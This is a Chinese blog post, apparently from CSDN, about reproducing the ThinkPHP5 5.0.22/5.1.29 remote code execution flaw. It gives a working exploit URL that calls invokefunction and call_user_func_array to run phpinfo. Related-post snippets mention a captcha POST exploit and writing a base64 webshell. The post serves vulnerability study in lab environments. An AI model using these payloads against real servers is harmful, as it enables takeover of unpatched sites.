Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞

告诉桃花不用开了

已于 2022-03-09 15:22:12 修改

阅读量3k

点赞数 1

分类专栏：已有的事后必再有文章标签：安全经验分享 web安全系统安全安全架构

于 2022-03-09 02:28:10 首次发布

本文链接：https://blog.csdn.net/gjqhs/article/details/123367356

版权

已有的事后必再有专栏收录该内容

15 篇文章 1 订阅

订阅专栏

这篇博客介绍了ThinkPHP5.5.0.23中存在的一个远程代码执行（RCE）漏洞。由于框架在处理控制器名称时的错误，若网站未启用强制路由，攻击者可以利用此漏洞执行任意方法，例如通过访问特定URL触发phpinfo。文章还提到了可以进一步利用该漏洞获取shell权限，但细节未详述。

摘要由CSDN通过智能技术生成

ThinkPHP5 5.0.23 远程代码执行漏洞_Gjqhs的博客-CSDN博客

没太大区别，不过是由于框架处理控制器名称不正确，如果网站未启用强制路由（这是默认设置），它可以执行任何方法，从而导致 RCE 漏洞。

访问即可执行phpinfo

http://ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

接下来可以shell之类的，不再赘述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

告诉桃花不用开了

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

weixin_67813445的博客

03-15

709

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

qq_53409748的博客

03-16

292

vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

参与评论您还未登录，请先登录后发表或查看评论

thinkphp5 5.0.22/5.1.29远程代码执行漏洞

weixin_45653478的博客

04-27

1151

ThinkPHP是中国使用极为广泛的PHP开发框架。在其版本 5 中，由于框架错误地处理了控制器名称，如果网站未启用强制路由（默认），它可以执行任何方法，从而导致 RCE 漏洞。

ThinkPHP5漏洞分析之代码执行

最新发布

duoba_an的博客

08-14

965

本次漏洞存在于的缓存类中。该类会将缓存数据通过序列化的方式，直接存储在文件中，攻击者通过精心构造的，即可将写入缓存文件。缓存文件的名字和目录均可预测出来，一旦缓存目录可访问或结合任意文件包含漏洞，即可触发。漏洞影响版本：。

ThinkPHP5 5.0.23 远程代码执行漏洞

EC_Carrot的博客

08-17

385

漏洞简介 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。漏洞复现发送如下数据包即可执行id命令： POST /index.php?s=captcha HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: M

漏洞复现----23、ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

七天

07-14

1377

文章目录一、漏洞简介二、漏洞代码三、漏洞复现五、修复代码一、漏洞简介 ThinkPHP是PHP语言的一种开源框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境，正式版需要PHP5.0以上版本支持，支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展，ThinkPHP框架本身没有什么特别模块要求，具体的应用系统运行环境要求视开发所涉及的模块。由于框架对控制器名没有进行足够的检测，导致在没有开启强制路由的情况下可以执行任意方法，从而导致远程命令执行漏洞。受影响的版

Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞漏洞复现

Boom！脑洞大爆炸的博客

11-11

2004

Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞漏洞复现

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

城南以南花亦开

09-16

469

在 ThinkPHP 版本 5 中由于框架没有对控制器名进行正确检测处理从而导致的远程命令执行漏洞。

复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

记录笔记

04-12

531

ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8089/index.php?s=captcha会出现如下报错 F12进入开发者用HackBar 插件发送 POST 请求得到回显：通过echo命令写入 Webshell 文件首先将一句话木马进行 Base64 编码 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE

记录一次vulhub ：Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞复现

sszsNo1的博客

06-29

250

vulhub ：Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞复现

Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接（复现详细过程）

m0_52701599的博客

03-19

3131

Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

thinkphp5远程执行代码漏洞修复补丁.zip

04-17

thinkphp5远程执行代码漏洞修复补丁

thinkphp 远程代码执行漏洞poc

12-11

漏洞影响范围：v5.x < 5.1.31，<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞

Thinkphp5.0.22/5.1.29远程代码执行漏洞

夜星空如海的博客

09-30

1523

ThinkPHP是一款运用极广的PHP开发框架。其版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。

Python武器库开发-武器库篇之Thinkphp5-5.0.22/5.1.29远程执行代码漏洞（六十五）

把自己活成一道光，因为你不知道，谁会借着你的光，走出了黑暗。请保持心中的善良，因为你不知道，谁会借着你的善良，走出了绝望。请保持你心中的信仰，因为你不知道，谁会借着你的信仰，走出了迷茫。请相信自己的力量，因为你不知道，谁会因为相信你，开始相信了自己....

06-24

1219

这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装，我们进入 ThinkPHP漏洞环境，可以 cd ThinkPHP，然后通过 ls 查看可以搭建的靶场，目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。

Thinkphp5-5.0.22/5.1.29远程执行代码漏洞

hovcfuti的博客

10-13

419

ThinkPHP版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。升级方法请参考：https://blog.thinkphp.cn/869075。vulhub拉取靶场。写入webshell。

ThinkPHP5远程代码执行漏洞

weixin_50464560的博客

08-15

4094

https://zhuanlan.zhihu.com/p/52173644 2018年12月10日,白帽汇安全研究院发现thinkphp官网发布了安全更新，修复了一个远程代码执行漏洞，该漏洞是由于框架对控制器名没有进行敏感字符检测，导致在没有开启强制路由的情况下可能导致远程代码执行。主要影响的版本为5.0.23和5.1.31之前的所有版本。此次爆出漏洞的ThinkPHP 5.x版本是官方于2015年发布的新一代框架，其中5.1.0RC版本于今年的5月2日发布，但在短短几个月时间内就爆出远程代码执行漏洞，

ThinkPHP 5.0 远程代码执行漏洞详解

"ThinkPHP 5.0 远程代码执行漏洞分析" 在网络安全领域，远程代码执行漏洞是一种极其危险的漏洞，允许攻击者在受害者的服务器上执行任意代码。这篇关于ThinkPHP 5.0 远程代码执行的分析报告，专注于探讨了如何利用这...